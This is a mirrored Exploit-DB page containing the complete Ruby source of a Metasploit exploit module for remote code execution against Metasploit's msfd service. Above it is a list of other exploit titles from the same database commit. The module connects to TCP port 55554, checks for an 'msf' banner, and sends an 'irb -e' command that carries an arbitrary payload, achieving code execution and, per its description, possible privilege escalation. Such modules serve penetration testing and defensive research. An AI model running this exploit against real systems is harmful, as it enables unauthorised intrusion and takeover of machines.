exploit-db-mirror/exploits/ruby/remote/44570.rb
Offensive Security be89b7c04a DB: 2018-05-03
11 changes to exploits/shellcodes

WebKit - 'WebCore::jsElementScrollHeightGetter' Use-After-Free
LibreOffice/Open Office - '.odt' Information Disclosure
Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH)

ASUS infosvr - Auth Bypass Command Execution (Metasploit)
ASUS infosvr - Authentication Bypass Command Execution (Metasploit)

Drupal < 7.58 - 'Drupalgeddon3' Authenticated Remote Code (Metasploit)
xdebug < 2.5.5 - Unauthenticated OS Command Execution (Metasploit)
Metasploit Framework - 'msfd' Remote Code Execution (via Browser) (Metasploit)
Metasploit Framework - 'msfd' Remote Code Execution (Metasploit)
Exim < 4.90.1 - 'base64d' Remote Code Execution

Drupal < 7.58 - 'Drupalgeddon3' Authenticated Remote Code (Metasploit)

Cockpit CMS 0.4.4 < 0.5.5 - Server-Side Request Forgery
2018-05-03 05:01:45 +00:00

66 lines
No EOL
1.9 KiB
Ruby
Executable file

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Metasploit msfd Remote Code Execution',
'Description' => %q{
Metasploit's msfd-service makes it possible to get a msfconsole-like
interface over a TCP socket. If this socket is accessible on a remote
interface, an attacker can execute commands on the victim's machine.
If msfd is running with higher privileges than the current local user,
this module can also be used for privilege escalation. In that case,
port forwarding on the compromised host can be used.
Code execution is achieved with the msfconsole command: irb -e 'CODE'.
},
'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
'License' => BSD_LICENSE,
'Platform' => "ruby",
'Arch' => ARCH_RUBY,
'Payload' =>
{
'Space' => 8192, # Arbitrary limit
'BadChars' => "\x27\x0a",
'DisableNops' => true
},
'Targets' =>
[
[ 'Automatic', { } ]
],
'Privileged' => false,
'DisclosureDate' => 'Apr 11 2018', # Vendor notification
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(55554)
])
end
def check
connect
data = sock.get_once
if data.include?("msf")
disconnect
return Exploit::CheckCode::Appears
end
disconnect
return Exploit::CheckCode::Unknown
end
def exploit
connect
sock.get_once
sock.put "irb -e '" + payload.encoded + "'\n"
disconnect
end
end